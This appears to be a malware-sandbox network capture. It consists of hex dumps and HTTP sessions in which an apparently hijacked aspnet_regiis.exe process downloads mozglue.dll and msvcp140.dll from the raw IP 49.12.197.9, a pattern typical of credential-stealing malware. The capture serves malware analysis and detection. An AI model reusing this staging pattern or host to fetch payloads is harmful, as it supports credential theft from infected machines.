                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                            Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                            Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                            Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                            Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                            Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                                            Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                            Data Ascii: ,0<48%8A)$


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            12192.168.2.94972349.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:03 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:03 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:03 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:03 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:03 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                            2024-10-03 01:27:03 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                            Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                            2024-10-03 01:27:03 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                            Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                            2024-10-03 01:27:03 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                            Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                            2024-10-03 01:27:03 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                            Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                            2024-10-03 01:27:04 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                            Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                            2024-10-03 01:27:04 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                            Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                            2024-10-03 01:27:04 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                            Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                            2024-10-03 01:27:04 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                            Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                            2024-10-03 01:27:04 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                            Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            13192.168.2.94972449.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:06 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:06 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:06 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:06 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:06 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                            Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
